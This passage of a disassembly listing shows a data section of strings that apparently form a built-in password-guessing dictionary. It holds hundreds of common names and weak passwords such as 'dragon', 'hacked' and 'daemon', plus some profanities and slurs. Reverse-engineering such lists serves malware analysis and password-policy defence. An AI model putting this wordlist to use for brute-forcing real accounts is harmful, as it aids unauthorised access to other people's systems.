aJessica db 'jessica',0 ; DATA XREF: ___:0042FBE8�o
aJerusale db 'jerusale',0 ; DATA XREF: ___:0042FBE4�o
align 4
aJerry db 'jerry',0 ; DATA XREF: ___:0042FBE0�o
align 4
aJenny db 'jenny',0 ; DATA XREF: ___:0042FBDC�o
align 4
aJennifer db 'jennifer',0 ; DATA XREF: ___:0042FBD8�o
align 10h
aJenni db 'jenni',0 ; DATA XREF: ___:0042FBD4�o
align 4
aJeff db 'jeff',0 ; DATA XREF: ___:0042FBD0�o
align 10h
aJeanne db 'jeanne',0 ; DATA XREF: ___:0042FBCC�o
align 4
aJean db 'jean',0 ; DATA XREF: ___:0042FBC8�o
align 10h
aJazz db 'jazz',0 ; DATA XREF: ___:0042FBC4�o
align 4
aJava db 'java',0 ; DATA XREF: ___:0042FBC0�o
align 10h
aJasmin db 'jasmin',0 ; DATA XREF: ___:0042FBBC�o
align 4
aJapan db 'japan',0 ; DATA XREF: ___:0042FBB8�o
align 10h
aJanie db 'janie',0 ; DATA XREF: ___:0042FBB4�o
align 4
aJanice db 'janice',0 ; DATA XREF: ___:0042FBB0�o
align 10h
aJanet db 'janet',0 ; DATA XREF: ___:0042FBAC�o
align 4
aJane db 'jane',0 ; DATA XREF: ___:0042FBA8�o
align 10h
aJail db 'jail',0 ; DATA XREF: ___:0042FBA4�o
align 4
aJackie db 'jackie',0 ; DATA XREF: ___:0042FBA0�o
align 10h
aIsis db 'isis',0 ; DATA XREF: ___:0042FB9C�o
align 4
aIrishman db 'irishman',0 ; DATA XREF: ___:0042FB98�o
align 4
aIrene db 'irene',0 ; DATA XREF: ___:0042FB94�o
align 4
aInvent db 'invent',0 ; DATA XREF: ___:0042FB90�o
align 4
aInteger db 'integer',0 ; DATA XREF: ___:0042FB8C�o
aInside db 'inside',0 ; DATA XREF: ___:0042FB88�o
align 4
aInput db 'input',0 ; DATA XREF: ___:0042FB84�o
align 4
aInnocuou db 'innocuou',0 ; DATA XREF: ___:0042FB80�o
align 4
aInna db 'inna',0 ; DATA XREF: ___:0042FB7C�o
align 10h
aIngrid db 'ingrid',0 ; DATA XREF: ___:0042FB78�o
align 4
aIngress db 'ingress',0 ; DATA XREF: ___:0042FB74�o
aIngres db 'ingres',0 ; DATA XREF: ___:0042FB70�o
align 4
aIndians db 'indians',0 ; DATA XREF: ___:0042FB6C�o
aIndiana db 'indiana',0 ; DATA XREF: ___:0042FB68�o
aIndian db 'indian',0 ; DATA XREF: ___:0042FB64�o
align 10h
aIndia db 'india',0 ; DATA XREF: ___:0042FB60�o
align 4
aInclude db 'include',0 ; DATA XREF: ___:0042FB5C�o
aImperial db 'imperial',0 ; DATA XREF: ___:0042FB58�o
align 4
aImmortal db 'immortal',0 ; DATA XREF: ___:0042FB54�o
align 4
aImbrogli db 'imbrogli',0 ; DATA XREF: ___:0042FB50�o
align 4
aImage db 'image',0 ; DATA XREF: ___:0042FB4C�o
align 4
aIllumina db 'illumina',0 ; DATA XREF: ___:0042FB48�o
align 4
aIcecream db 'icecream',0 ; DATA XREF: ___:0042FB44�o
align 4
aHypertxt db 'hypertxt',0 ; DATA XREF: ___:0042FB40�o
align 10h
aHyper db 'hyper',0 ; DATA XREF: ___:0042FB3C�o
align 4
aHydrogen db 'hydrogen',0 ; DATA XREF: ___:0042FB38�o
align 4
aHutchins db 'hutchins',0 ; DATA XREF: ___:0042FB34�o
align 10h
aHunter db 'hunter',0 ; DATA XREF: ___:0042FB30�o
align 4
aHunt db 'hunt',0 ; DATA XREF: ___:0042FB2C�o
align 10h
aHttp_0 db 'http',0 ; DATA XREF: ___:0042FB28�o
align 4
aHotel db 'hotel',0 ; DATA XREF: ___:0042FB24�o
align 10h
aHotdog db 'hotdog',0 ; DATA XREF: ___:0042FB20�o
align 4
aHost db 'host',0 ; DATA XREF: ___:0042FB1C�o
align 10h
aHorus db 'horus',0 ; DATA XREF: ___:0042FB18�o
align 4
aHorse db 'horse',0 ; DATA XREF: ___:0042FB14�o
align 10h
aHorror db 'horror',0 ; DATA XREF: ___:0042FB10�o
align 4
aHorrible db 'horrible',0 ; DATA XREF: ___:0042FB0C�o
align 4
aHorny db 'horny',0 ; DATA XREF: ___:0042FB08�o
align 4
aHooters db 'hooters',0 ; DATA XREF: ___:0042FB04�o
aHooker db 'hooker',0 ; DATA XREF: ___:0042FB00�o
align 4
aHoney db 'honey',0 ; DATA XREF: ___:0042FAFC�o
align 4
aHomework db 'homework',0 ; DATA XREF: ___:0042FAF8�o
align 10h
aHomer db 'homer',0 ; DATA XREF: ___:0042FAF4�o
align 4
aHomepage db 'homepage',0 ; DATA XREF: ___:0042FAF0�o
align 4
aHollywoo db 'hollywoo',0 ; DATA XREF: ___:0042FAEC�o
align 10h
aHolly db 'holly',0 ; DATA XREF: ___:0042FAE8�o
align 4
aHole db 'hole',0 ; DATA XREF: ___:0042FAE4�o
align 10h
aHits db 'hits',0 ; DATA XREF: ___:0042FAE0�o
align 4
aHitler db 'hitler',0 ; DATA XREF: ___:0042FADC�o
align 10h
aHighland db 'highland',0 ; DATA XREF: ___:0042FAD8�o
align 4
aHigh db 'high',0 ; DATA XREF: ___:0042FAD4�o
align 4
aHidden db 'hidden',0 ; DATA XREF: ___:0042FAD0�o
align 4
aHibernia db 'hibernia',0 ; DATA XREF: ___:0042FACC�o
align 4
aHiawatha db 'hiawatha',0 ; DATA XREF: ___:0042FAC8�o
align 4
aHexadeci db 'hexadeci',0 ; DATA XREF: ___:0042FAC4�o
align 10h
aHewlett db 'hewlett',0 ; DATA XREF: ___:0042FAC0�o
aHeroin db 'heroin',0 ; DATA XREF: ___:0042FABC�o
align 10h
aHero db 'hero',0 ; DATA XREF: ___:0042FAB8�o
align 4
aHerbert db 'herbert',0 ; DATA XREF: ___:0042FAB4�o
aHerb db 'herb',0 ; DATA XREF: ___:0042FAB0�o
align 4
aHelp db 'help',0 ; DATA XREF: ___:0042FAAC�o
align 10h
aHello db 'hello',0 ; DATA XREF: ___:0042FAA8�o
align 4
aHell db 'hell',0 ; DATA XREF: ___:0042FAA4�o
align 10h
aHeinlein db 'heinlein',0 ; DATA XREF: ___:0042FAA0�o
align 4
aHeidi db 'heidi',0 ; DATA XREF: ___:0042FA9C�o
align 4
aHebrides db 'hebrides',0 ; DATA XREF: ___:0042FA98�o
align 10h
aHeather db 'heather',0 ; DATA XREF: ___:0042FA94�o
aHeathen db 'heathen',0 ; DATA XREF: ___:0042FA90�o
aHeat db 'heat',0 ; DATA XREF: ___:0042FA8C�o
align 4
aHeadbang db 'headbang',0 ; DATA XREF: ___:0042FA88�o
align 4
aHead db 'head',0 ; DATA XREF: ___:0042FA84�o
align 4
aHawaii db 'hawaii',0 ; DATA XREF: ___:0042FA80�o
align 4
aHaven db 'haven',0 ; DATA XREF: ___:0042FA7C�o
align 4
aHate db 'hate',0 ; DATA XREF: ___:0042FA78�o
align 4
aHarvey db 'harvey',0 ; DATA XREF: ___:0042FA74�o
align 4
aHarold db 'harold',0 ; DATA XREF: ___:0042FA70�o
align 4
aHarmony db 'harmony',0 ; DATA XREF: ___:0042FA6C�o
aHarddriv db 'harddriv',0 ; DATA XREF: ___:0042FA68�o
align 4
aHardcore db 'hardcore',0 ; DATA XREF: ___:0042FA64�o
align 4
aHard db 'hard',0 ; DATA XREF: ___:0042FA60�o
align 4
aHappenin db 'happenin',0 ; DATA XREF: ___:0042FA5C�o
align 4
aHandjob db 'handjob',0 ; DATA XREF: ___:0042FA58�o
aHandily db 'handily',0 ; DATA XREF: ___:0042FA54�o
aHandel db 'handel',0 ; DATA XREF: ___:0042FA50�o
align 10h
aHamster db 'hamster',0 ; DATA XREF: ___:0042FA4C�o
aHamlet db 'hamlet',0 ; DATA XREF: ___:0042FA48�o
align 10h
aHallowee db 'hallowee',0 ; DATA XREF: ___:0042FA44�o
align 4
aHair db 'hair',0 ; DATA XREF: ___:0042FA40�o
align 4
aHagar db 'hagar',0 ; DATA XREF: ___:0042FA3C�o
align 4
aHacked db 'hacked',0 ; DATA XREF: ___:0042FA38�o
align 4
aHack db 'hack',0 ; DATA XREF: ___:0042FA34�o
align 4
aGuntis db 'guntis',0 ; DATA XREF: ___:0042FA30�o
align 4
aGumption db 'gumption',0 ; DATA XREF: ___:0042FA2C�o
align 10h
aGuitar db 'guitar',0 ; DATA XREF: ___:0042FA28�o
align 4
aGuess db 'guess',0 ; DATA XREF: ___:0042FA24�o
align 10h
aGucci db 'gucci',0 ; DATA XREF: ___:0042FA20�o
align 4
aGuardian db 'guardian',0 ; DATA XREF: ___:0042FA1C�o
align 4
aGryphon db 'gryphon',0 ; DATA XREF: ___:0042FA18�o
aGroup db 'group',0 ; DATA XREF: ___:0042FA14�o
align 4
aGreen db 'green',0 ; DATA XREF: ___:0042FA10�o
align 4
aGreat db 'great',0 ; DATA XREF: ___:0042FA0C�o
align 4
aGrant db 'grant',0 ; DATA XREF: ___:0042FA08�o
align 4
aGrand db 'grand',0 ; DATA XREF: ___:0042FA04�o
align 4
aGrahm db 'grahm',0 ; DATA XREF: ___:0042FA00�o
align 4
aGraham db 'graham',0 ; DATA XREF: ___:0042F9FC�o
align 4
aGrades db 'grades',0 ; DATA XREF: ___:0042F9F8�o
align 4
aGovermen db 'govermen',0 ; DATA XREF: ___:0042F9F4�o
align 4
aGouge db 'gouge',0 ; DATA XREF: ___:0042F9F0�o
align 10h
aGosling db 'gosling',0 ; DATA XREF: ___:0042F9EC�o
aGorges db 'gorges',0 ; DATA XREF: ___:0042F9E8�o
align 10h
aGorgeous db 'gorgeous',0 ; DATA XREF: ___:0042F9E4�o
align 4
aGood db 'good',0 ; DATA XREF: ___:0042F9E0�o
align 4
aGolfer db 'golfer',0 ; DATA XREF: ___:0042F9DC�o
align 4
aGolf db 'golf',0 ; DATA XREF: ___:0042F9D8�o
align 4
aGolden db 'golden',0 ; DATA XREF: ___:0042F9D4�o
align 4
aGold db 'gold',0 ; DATA XREF: ___:0042F9D0�o
align 4
aGlacier db 'glacier',0 ; DATA XREF: ___:0042F9CC�o
aGirl db 'girl',0 ; DATA XREF: ___:0042F9C8�o
align 4
aGinger db 'ginger',0 ; DATA XREF: ___:0042F9C4�o
align 4
aGina db 'gina',0 ; DATA XREF: ___:0042F9C0�o
align 4
aGigabyte db 'gigabyte',0 ; DATA XREF: ___:0042F9BC�o
align 10h
aGibson db 'gibson',0 ; DATA XREF: ___:0042F9B8�o
align 4
aGhost db 'ghost',0 ; DATA XREF: ___:0042F9B4�o
align 10h
aGertrude db 'gertrude',0 ; DATA XREF: ___:0042F9B0�o
align 4
aGerm db 'germ',0 ; DATA XREF: ___:0042F9AC�o
align 4
aGeorge db 'george',0 ; DATA XREF: ___:0042F9A8�o
align 4
aGauss db 'gauss',0 ; DATA XREF: ___:0042F9A4�o
align 4
aGatt db 'gatt',0 ; DATA XREF: ___:0042F9A0�o
align 4
aGatherin db 'gatherin',0 ; DATA XREF: ___:0042F99C�o
align 4
aGateway db 'gateway',0 ; DATA XREF: ___:0042F998�o
aGarfield db 'garfield',0 ; DATA XREF: ___:0042F994�o
align 4
aGardner db 'gardner',0 ; DATA XREF: ___:0042F990�o
aGames db 'games',0 ; DATA XREF: ___:0042F98C�o
align 4
aGabriel db 'gabriel',0 ; DATA XREF: ___:0042F988�o
aFungible db 'fungible',0 ; DATA XREF: ___:0042F984�o
align 10h
aFunction db 'function',0 ; DATA XREF: ___:0042F980�o
align 4
aFudge db 'fudge',0 ; DATA XREF: ___:0042F97C�o
align 4
aFuckyou db 'fuckyou',0 ; DATA XREF: ___:0042F978�o
aFuckme db 'fuckme',0 ; DATA XREF: ___:0042F974�o
align 4
aFucking db 'fucking',0 ; DATA XREF: ___:0042F970�o
aFucker db 'fucker',0 ; DATA XREF: ___:0042F96C�o
align 4
aFuck db 'fuck',0 ; DATA XREF: ___:0042F968�o
align 4
aFryguy db 'fryguy',0 ; DATA XREF: ___:0042F964�o
align 4
aFrog db 'frog',0 ; DATA XREF: ___:0042F960�o
align 4
aFrighten db 'frighten',0 ; DATA XREF: ___:0042F95C�o
align 4
aFriends db 'friends',0 ; DATA XREF: ___:0042F958�o
aFriend db 'friend',0 ; DATA XREF: ___:0042F954�o
align 4
aFriday db 'friday',0 ; DATA XREF: ___:0042F950�o
align 10h
aFrench db 'french',0 ; DATA XREF: ___:0042F94C�o
align 4
aFreedom db 'freedom',0 ; DATA XREF: ___:0042F948�o
aFree db 'free',0 ; DATA XREF: ___:0042F944�o
align 4
aFred db 'fred',0 ; DATA XREF: ___:0042F940�o
align 10h
aFreak db 'freak',0 ; DATA XREF: ___:0042F93C�o
align 4
aFrank db 'frank',0 ; DATA XREF: ___:0042F938�o
align 10h
aFrance db 'france',0 ; DATA XREF: ___:0042F934�o
align 4
aFoxtrot db 'foxtrot',0 ; DATA XREF: ___:0042F930�o
aFourier db 'fourier',0 ; DATA XREF: ___:0042F92C�o
aForsythe db 'forsythe',0 ; DATA XREF: ___:0042F928�o
align 4
aFornicat db 'fornicat',0 ; DATA XREF: ___:0042F924�o
align 10h
aFormat db 'format',0 ; DATA XREF: ___:0042F920�o
align 4
aForm db 'form',0 ; DATA XREF: ___:0042F91C�o
align 10h
aForever db 'forever',0 ; DATA XREF: ___:0042F918�o
aForesigh db 'foresigh',0 ; DATA XREF: ___:0042F914�o
align 4
aFord db 'ford',0 ; DATA XREF: ___:0042F910�o
align 4
aForce db 'force',0 ; DATA XREF: ___:0042F90C�o
align 4
aFootball db 'football',0 ; DATA XREF: ___:0042F908�o
align 10h
aFoolproo db 'foolproo',0 ; DATA XREF: ___:0042F904�o
align 4
aFool db 'fool',0 ; DATA XREF: ___:0042F900�o
align 4
aFood db 'food',0 ; DATA XREF: ___:0042F8FC�o
align 4
aFlowers db 'flowers',0 ; DATA XREF: ___:0042F8F8�o
aFlower db 'flower',0 ; DATA XREF: ___:0042F8F4�o
align 4
aFlorida db 'florida',0 ; DATA XREF: ___:0042F8F0�o
aFloat db 'float',0 ; DATA XREF: ___:0042F8EC�o
align 4
aFlakes db 'flakes',0 ; DATA XREF: ___:0042F8E8�o
align 4
aFishers db 'fishers',0 ; DATA XREF: ___:0042F8E4�o
aFirewall db 'firewall',0 ; DATA XREF: ___:0042F8E0�o
align 4
aFire db 'fire',0 ; DATA XREF: ___:0042F8DC�o
align 10h
aFinite db 'finite',0 ; DATA XREF: ___:0042F8D8�o
align 4
aFile db 'file',0 ; DATA XREF: ___:0042F8D4�o
align 10h
aFight db 'fight',0 ; DATA XREF: ___:0042F8D0�o
align 4
aField db 'field',0 ; DATA XREF: ___:0042F8CC�o
align 10h
aFidelity db 'fidelity',0 ; DATA XREF: ___:0042F8C8�o
align 4
aFerrari db 'ferrari',0 ; DATA XREF: ___:0042F8C4�o
aFermat db 'fermat',0 ; DATA XREF: ___:0042F8C0�o
align 4
aFender db 'fender',0 ; DATA XREF: ___:0042F8BC�o
align 4
aFelicia db 'felicia',0 ; DATA XREF: ___:0042F8B8�o
aFeds db 'feds',0 ; DATA XREF: ___:0042F8B4�o
align 4
aFear db 'fear',0 ; DATA XREF: ___:0042F8B0�o
align 4
aFast db 'fast',0 ; DATA XREF: ___:0042F8AC�o
align 4
aFart db 'fart',0 ; DATA XREF: ___:0042F8A8�o
align 4
aFaraday db 'faraday',0 ; DATA XREF: ___:0042F8A4�o
aFarad db 'farad',0 ; DATA XREF: ___:0042F8A0�o
align 4
aFamily db 'family',0 ; DATA XREF: ___:0042F89C�o
align 4
aFalse db 'false',0 ; DATA XREF: ___:0042F898�o
align 4
aFalcon db 'falcon',0 ; DATA XREF: ___:0042F894�o
align 4
aFaith db 'faith',0 ; DATA XREF: ___:0042F890�o
align 4
aFairway db 'fairway',0 ; DATA XREF: ___:0042F88C�o
aExtensio db 'extensio',0 ; DATA XREF: ___:0042F888�o
align 10h
aExplosiv db 'explosiv',0 ; DATA XREF: ___:0042F884�o
align 4
aExplorer db 'explorer',0 ; DATA XREF: ___:0042F880�o
align 4
aExplore db 'explore',0 ; DATA XREF: ___:0042F87C�o
aExplode db 'explode',0 ; DATA XREF: ___:0042F878�o
aExpert db 'expert',0 ; DATA XREF: ___:0042F874�o
align 10h
aEvelyn db 'evelyn',0 ; DATA XREF: ___:0042F870�o
align 4
aEuclid db 'euclid',0 ; DATA XREF: ___:0042F86C�o
align 10h
aEternity db 'eternity',0 ; DATA XREF: ___:0042F868�o
align 4
aEstate db 'estate',0 ; DATA XREF: ___:0042F864�o
align 4
aEstablis db 'establis',0 ; DATA XREF: ___:0042F860�o
align 10h
aErsatz db 'ersatz',0 ; DATA XREF: ___:0042F85C�o
align 4
aErotic db 'erotic',0 ; DATA XREF: ___:0042F858�o
align 10h
aErin db 'erin',0 ; DATA XREF: ___:0042F854�o
align 4
aErika db 'erika',0 ; DATA XREF: ___:0042F850�o
align 10h
aErica db 'erica',0 ; DATA XREF: ___:0042F84C�o
align 4
aEric db 'eric',0 ; DATA XREF: ___:0042F848�o
align 10h
aErenity db 'erenity',0 ; DATA XREF: ___:0042F844�o
aEnzyme db 'enzyme',0 ; DATA XREF: ___:0042F840�o
align 10h
aEnterpri db 'enterpri',0 ; DATA XREF: ___:0042F83C�o
align 4
aEnter db 'enter',0 ; DATA XREF: ___:0042F838�o
align 4
aEnglish db 'english',0 ; DATA XREF: ___:0042F834�o
aEngland db 'england',0 ; DATA XREF: ___:0042F830�o
aEngineer db 'engineer',0 ; DATA XREF: ___:0042F82C�o
align 10h
aEngine db 'engine',0 ; DATA XREF: ___:0042F828�o
align 4
aEnemy db 'enemy',0 ; DATA XREF: ___:0042F824�o
align 10h
aEmmanuel db 'emmanuel',0 ; DATA XREF: ___:0042F820�o
align 4
aEmily db 'emily',0 ; DATA XREF: ___:0042F81C�o
align 4
aEmerald db 'emerald',0 ; DATA XREF: ___:0042F818�o
aEmail_0 db 'email',0 ; DATA XREF: ___:0042F814�o
align 4
aEllen db 'ellen',0 ; DATA XREF: ___:0042F810�o
align 4
aElizabet db 'elizabet',0 ; DATA XREF: ___:0042F80C�o
align 4
aElephant db 'elephant',0 ; DATA XREF: ___:0042F808�o
align 4
aElectron db 'electron',0 ; DATA XREF: ___:0042F804�o
align 10h
aElanor db 'elanor',0 ; DATA XREF: ___:0042F800�o
align 4
aElaine db 'elaine',0 ; DATA XREF: ___:0042F7FC�o
align 10h
aEinstein db 'einstein',0 ; DATA XREF: ___:0042F7F8�o
align 4
aEinsiein db 'einsiein',0 ; DATA XREF: ___:0042F7F4�o
align 4
aEileen db 'eileen',0 ; DATA XREF: ___:0042F7F0�o
align 10h
aEiderdow db 'eiderdow',0 ; DATA XREF: ___:0042F7EC�o
align 4
aEgghead db 'egghead',0 ; DATA XREF: ___:0042F7E8�o
aEdwina db 'edwina',0 ; DATA XREF: ___:0042F7E4�o
align 4
aEdwin db 'edwin',0 ; DATA XREF: ___:0042F7E0�o
align 4
aEducatio db 'educatio',0 ; DATA XREF: ___:0042F7DC�o
align 10h
aEducation db 'education',0 ; DATA XREF: ___:0042F7D8�o
align 4
aEdition db 'edition',0 ; DATA XREF: ___:0042F7D4�o
aEdit db 'edit',0 ; DATA XREF: ___:0042F7D0�o
align 4
aEdinburg db 'edinburg',0 ; DATA XREF: ___:0042F7CC�o
align 4
aEdges db 'edges',0 ; DATA XREF: ___:0042F7C8�o
align 10h
aEddie db 'eddie',0 ; DATA XREF: ___:0042F7C4�o
align 4
aEcho db 'echo',0 ; DATA XREF: ___:0042F7C0�o
align 10h
aEatme db 'eatme',0 ; DATA XREF: ___:0042F7BC�o
align 4
aEasy db 'easy',0 ; DATA XREF: ___:0042F7B8�o
align 10h
aEasier db 'easier',0 ; DATA XREF: ___:0042F7B4�o
align 4
aEarth db 'earth',0 ; DATA XREF: ___:0042F7B0�o
align 10h
aEagle db 'eagle',0 ; DATA XREF: ___:0042F7AC�o
align 4
aEager db 'eager',0 ; DATA XREF: ___:0042F7A8�o
align 10h
aDyke db 'dyke',0 ; DATA XREF: ___:0042F7A4�o
align 4
aDungeon db 'dungeon',0 ; DATA XREF: ___:0042F7A0�o
aDuncan db 'duncan',0 ; DATA XREF: ___:0042F79C�o
align 4
aDulce db 'dulce',0 ; DATA XREF: ___:0042F798�o
align 10h
aDuke db 'duke',0 ; DATA XREF: ___:0042F794�o
align 4
aDuelist db 'duelist',0 ; DATA XREF: ___:0042F790�o
aDude db 'dude',0 ; DATA XREF: ___:0042F78C�o
align 4
aDuck db 'duck',0 ; DATA XREF: ___:0042F788�o
align 10h
aDrought db 'drought',0 ; DATA XREF: ___:0042F784�o
aDrive db 'drive',0 ; DATA XREF: ___:0042F780�o
align 10h
aDrdoom db 'drdoom',0 ; DATA XREF: ___:0042F77C�o
align 4
aDragon db 'dragon',0 ; DATA XREF: ___:0042F778�o
align 10h
aDownload db 'download',0 ; DATA XREF: ___:0042F774�o
align 4
aDope db 'dope',0 ; DATA XREF: ___:0042F770�o
align 4
aDoors db 'doors',0 ; DATA XREF: ___:0042F76C�o
align 4
aDoor db 'door',0 ; DATA XREF: ___:0042F768�o
align 4
aDoonesbu db 'doonesbu',0 ; DATA XREF: ___:0042F764�o
align 10h
aDoomsday db 'doomsday',0 ; DATA XREF: ___:0042F760�o
align 4
aDoomii db 'doomii',0 ; DATA XREF: ___:0042F75C�o
align 4
aDoom2 db 'doom2',0 ; DATA XREF: ___:0042F758�o
align 4
aDoom db 'doom',0 ; DATA XREF: ___:0042F754�o
align 4
aDong db 'dong',0 ; DATA XREF: ___:0042F750�o
align 4
aDollar db 'dollar',0 ; DATA XREF: ___:0042F74C�o
align 4
aDoctor db 'doctor',0 ; DATA XREF: ___:0042F748�o
align 4
aDisplay_0 db 'display',0 ; DATA XREF: ___:0042F744�o
aDisney db 'disney',0 ; DATA XREF: ___:0042F740�o
align 4
aDiskette db 'diskette',0 ; DATA XREF: ___:0042F73C�o
align 4
aDisk_0 db 'disk',0 ; DATA XREF: ___:0042F738�o
align 10h
aDiscover db 'discover',0 ; DATA XREF: ___:0042F734�o
align 4
aDisclose db 'disclose',0 ; DATA XREF: ___:0042F730�o
align 4
aDiscipli db 'discipli',0 ; DATA XREF: ___:0042F72C�o
align 4
aDisc db 'disc',0 ; DATA XREF: ___:0042F728�o
align 4
aDirty db 'dirty',0 ; DATA XREF: ___:0042F724�o
align 4
aDirector db 'director',0 ; DATA XREF: ___:0042F720�o
align 10h
aDirect db 'direct',0 ; DATA XREF: ___:0042F71C�o
align 4
aDipshit db 'dipshit',0 ; DATA XREF: ___:0042F718�o
aDinosaur db 'dinosaur',0 ; DATA XREF: ___:0042F714�o
align 4
aDigital db 'digital',0 ; DATA XREF: ___:0042F710�o
aDieter db 'dieter',0 ; DATA XREF: ___:0042F70C�o
align 4
aDiet db 'diet',0 ; DATA XREF: ___:0042F708�o
align 4
aDiehard db 'diehard',0 ; DATA XREF: ___:0042F704�o
aDick db 'dick',0 ; DATA XREF: ___:0042F700�o
align 4
aDice db 'dice',0 ; DATA XREF: ___:0042F6FC�o
align 4
aDiane db 'diane',0 ; DATA XREF: ___:0042F6F8�o
align 4
aDiana db 'diana',0 ; DATA XREF: ___:0042F6F4�o
align 4
aDiamond db 'diamond',0 ; DATA XREF: ___:0042F6F0�o
aDial db 'dial',0 ; DATA XREF: ___:0042F6EC�o
align 4
aDevice db 'device',0 ; DATA XREF: ___:0042F6E8�o
align 4
aDevelop db 'develop',0 ; DATA XREF: ___:0042F6E4�o
aDesperat db 'desperat',0 ; DATA XREF: ___:0042F6E0�o
align 4
aDesktop db 'desktop',0 ; DATA XREF: ___:0042F6DC�o
aDesk db 'desk',0 ; DATA XREF: ___:0042F6D8�o
align 4
aDesiree db 'desiree',0 ; DATA XREF: ___:0042F6D4�o
aDennis db 'dennis',0 ; DATA XREF: ___:0042F6D0�o
align 4
aDenise db 'denise',0 ; DATA XREF: ___:0042F6CC�o
align 10h
aDemocrat db 'democrat',0 ; DATA XREF: ___:0042F6C8�o
align 4
aDeluge db 'deluge',0 ; DATA XREF: ___:0042F6C4�o
align 4
aDelta db 'delta',0 ; DATA XREF: ___:0042F6C0�o
align 4
aDefoe db 'defoe',0 ; DATA XREF: ___:0042F6BC�o
align 4
aDefault_0 db 'DEFAULT',0 ; DATA XREF: ___:0042F6B8�o
aDeck db 'deck',0 ; DATA XREF: ___:0042F6B0�o
align 4
aDecember db 'december',0 ; DATA XREF: ___:0042F6AC�o
align 10h
aDebug db 'debug',0 ; DATA XREF: ___:0042F6A8�o
align 4
aDeborah db 'deborah',0 ; DATA XREF: ___:0042F6A4�o
aDebbie db 'debbie',0 ; DATA XREF: ___:0042F6A0�o
align 4
aDeathsta db 'deathsta',0 ; DATA XREF: ___:0042F69C�o
align 4
aDead db 'dead',0 ; DATA XREF: ___:0042F698�o
align 4
aDawn db 'dawn',0 ; DATA XREF: ___:0042F694�o
align 4
aDave db 'dave',0 ; DATA XREF: ___:0042F690�o
align 4
aData db 'data',0 ; DATA XREF: ___:0042F68C�o
align 4
aDarkaven db 'darkaven',0 ; DATA XREF: ___:0042F688�o
align 10h
aDark db 'dark',0 ; DATA XREF: ___:0042F684�o
align 4
aDapper db 'dapper',0 ; DATA XREF: ___:0042F680�o
align 10h
aDanny db 'danny',0 ; DATA XREF: ___:0042F67C�o
align 4
aDanielle db 'danielle',0 ; DATA XREF: ___:0042F678�o
align 4
aDaniel db 'daniel',0 ; DATA XREF: ___:0042F674�o
align 4
aDancer db 'dancer',0 ; DATA XREF: ___:0042F670�o
align 4
aDana db 'dana',0 ; DATA XREF: ___:0042F66C�o
align 4
aDaisy db 'daisy',0 ; DATA XREF: ___:0042F668�o
align 4
aDaemon db 'daemon',0 ; DATA XREF: ___:0042F664�o
align 4
aCynthia db 'cynthia',0 ; DATA XREF: ___:0042F660�o
aCyberspa db 'cyberspa',0 ; DATA XREF: ___:0042F65C�o
align 10h
aCyberpun db 'cyberpun',0 ; DATA XREF: ___:0042F658�o
align 4
aCyber db 'cyber',0 ; DATA XREF: ___:0042F654�o
align 4
aCustomer db 'customer',0 ; DATA XREF: ___:0042F650�o
align 10h
aCunt db 'cunt',0 ; DATA XREF: ___:0042F64C�o
align 4
aCshrc db 'cshrc',0 ; DATA XREF: ___:0042F648�o
align 10h
aCrystal db 'crystal',0 ; DATA XREF: ___:0042F644�o
aCristina db 'cristina',0 ; DATA XREF: ___:0042F640�o
align 4
aCriminal db 'criminal',0 ; DATA XREF: ___:0042F63C�o
align 10h
aCrime db 'crime',0 ; DATA XREF: ___:0042F638�o
align 4
aCretin db 'cretin',0 ; DATA XREF: ___:0042F634�o
align 10h
aCreosote db 'creosote',0 ; DATA XREF: ___:0042F630�o
align 4
aCredit db 'credit',0 ; DATA XREF: ___:0042F62C�o
align 4
aCreature db 'creature',0 ; DATA XREF: ___:0042F628�o
align 10h
aCreation db 'creation',0 ; DATA XREF: ___:0042F624�o
align 4
aCreate db 'create',0 ; DATA XREF: ___:0042F620�o
align 4
aCream db 'cream',0 ; DATA XREF: ___:0042F61C�o
align 4
aCrackpot db 'crackpot',0 ; DATA XREF: ___:0042F618�o
align 4
aCrack db 'crack',0 ; DATA XREF: ___:0042F614�o
align 10h
aCowboy db 'cowboy',0 ; DATA XREF: ___:0042F610�o
align 4
aCouscous db 'couscous',0 ; DATA XREF: ___:0042F60C�o
align 4
aCountry db 'country',0 ; DATA XREF: ___:0042F608�o
aCounters db 'counters',0 ; DATA XREF: ___:0042F604�o
align 4
aCorrect db 'correct',0 ; DATA XREF: ___:0042F600�o
aCorneliu db 'corneliu',0 ; DATA XREF: ___:0042F5FC�o
align 4
aCopy db 'copy',0 ; DATA XREF: ___:0042F5F8�o
align 4
aCops db 'cops',0 ; DATA XREF: ___:0042F5F4�o
align 4
aCopper db 'copper',0 ; DATA XREF: ___:0042F5F0�o
align 4
aCooper db 'cooper',0 ; DATA XREF: ___:0042F5EC�o
align 4
aCool db 'cool',0 ; DATA XREF: ___:0042F5E8�o
align 4
aCookie db 'cookie',0 ; DATA XREF: ___:0042F5E4�o
align 4
aCookbook db 'cookbook',0 ; DATA XREF: ___:0042F5E0�o
align 4
aCook db 'cook',0 ; DATA XREF: ___:0042F5DC�o
align 10h
aContinue db 'continue',0 ; DATA XREF: sub_40F6F1+2199�o
; ___:0042F5D8�o
align 4
aConsole db 'console',0 ; DATA XREF: ___:0042F5D4�o
aConserva db 'conserva',0 ; DATA XREF: ___:0042F5D0�o
align 10h
aConnie db 'connie',0 ; DATA XREF: ___:0042F5CC�o
align 4
aCondom db 'condom',0 ; DATA XREF: ___:0042F5C4�o
align 10h
aCondo db 'condo',0 ; DATA XREF: ___:0042F5C0�o
align 4
aComrades db 'comrades',0 ; DATA XREF: ___:0042F5BC�o
align 4
aComrade db 'comrade',0 ; DATA XREF: ___:0042F5B8�o
aComputin db 'computin',0 ; DATA XREF: ___:0042F5B4�o
align 4
aCompany db 'company',0 ; DATA XREF: ___:0042F5B0�o
aCommrade db 'commrade',0 ; DATA XREF: ___:0042F5AC�o
align 4
aCommit db 'commit',0 ; DATA XREF: ___:0042F5A8�o
align 4
aComics db 'comics',0 ; DATA XREF: ___:0042F5A4�o
align 4
aCombat db 'combat',0 ; DATA XREF: ___:0042F5A0�o
align 4
aColor db 'color',0 ; DATA XREF: ___:0042F59C�o
align 4
aCollins db 'collins',0 ; DATA XREF: ___:0042F598�o
aCold db 'cold',0 ; DATA XREF: ___:0042F594�o
align 4
aCola db 'cola',0 ; DATA XREF: ___:0042F590�o
align 4
aCoke db 'coke',0 ; DATA XREF: ___:0042F58C�o
align 4
aCoin db 'coin',0 ; DATA XREF: ___:0042F588�o
align 4
aCoffee db 'coffee',0 ; DATA XREF: ___:0042F584�o
align 4
aCodeword db 'codeword',0 ; DATA XREF: ___:0042F580�o
